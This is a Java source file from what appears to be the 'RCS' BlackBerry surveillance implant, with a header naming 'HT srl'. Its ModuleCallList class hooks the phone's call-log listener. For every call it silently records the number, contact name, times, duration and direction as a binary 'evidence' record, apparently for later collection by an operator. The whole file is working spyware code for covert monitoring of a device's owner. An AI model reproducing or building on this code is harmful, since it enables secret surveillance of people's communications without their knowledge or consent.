
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry_lib
 * File         : CallListAgent.java
 * Created      : 26-mar-2010
 * *************************************************/
package blackberry.module;

import java.util.Date;

import net.rim.device.api.util.DataBuffer;
import blackberry.AppListener;
import blackberry.Messages;
import blackberry.config.ConfModule;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceType;
import blackberry.interfaces.CallListObserver;
import blackberry.utils.DateTime;
import blackberry.utils.Utils;

/**
 * The Class CallListAgent.
 */
public final class ModuleCallList extends BaseModule implements
        CallListObserver {





    //13.0=calllist
    public static String getStaticType() {
        return Messages.getString("13.0"); //$NON-NLS-1$
    }

    private static boolean listening = false;

    public synchronized void actualStart() {








        AppListener.getInstance().addCallListObserver(this);
        listening = true;
    }

    public synchronized void actualStop() {



        AppListener.getInstance().removeCallListObserver(this);
        listening = false;
    }

    /*
     * (non-Javadoc)
     * @see blackberry.threadpool.TimerJob#actualRun()
     */
    public void actualLoop() {
    }

    /*
     * (non-Javadoc)
     * @see blackberry.agent.Agent#parse(byte[])
     */
    protected boolean parse(ConfModule conf) {

        return true;
    }

    public void callLogAdded(String number, String name, Date date,
            int duration, boolean outgoing, boolean missed) {





        final String nametype = "u"; //$NON-NLS-1$
        final String note = "no notes"; //$NON-NLS-1$








        final int LOG_CALLIST_VERSION = 0;

        int len = 28; //0x1C;

        len += wsize(number);
        len += wsize(name);
        len += wsize(note);
        len += wsize(nametype);

        final byte[] data = new byte[len];

        final DataBuffer databuffer = new DataBuffer(data, 0, len, false);

        final DateTime from = new DateTime(date);
        final DateTime to = new DateTime(new Date(date.getTime() + duration
                * 1000));

        databuffer.writeInt(len);
        databuffer.writeInt(LOG_CALLIST_VERSION);
        databuffer.writeLong(from.getFiledate());
        databuffer.writeLong(to.getFiledate());

        final int flags = (outgoing ? 1 : 0) + (missed ? 0 : 6);
        databuffer.writeInt(flags);






        Utils.addTypedString(databuffer, (byte) 0x01, name);
        Utils.addTypedString(databuffer, (byte) 0x02, nametype);
        Utils.addTypedString(databuffer, (byte) 0x04, note);
        Utils.addTypedString(databuffer, (byte) 0x08, number);

        Evidence evidence = new Evidence(EvidenceType.CALLLIST);
        evidence.atomicWriteOnce(getAdditionalData(), databuffer.getArray());

    }

    private int wsize(String string) {
        if (string.length() == 0) {
            return 0;
        } else {
            return string.length() * 2 + 4;
        }
    }

    private byte[] getAdditionalData() {
        return null;
    }

}
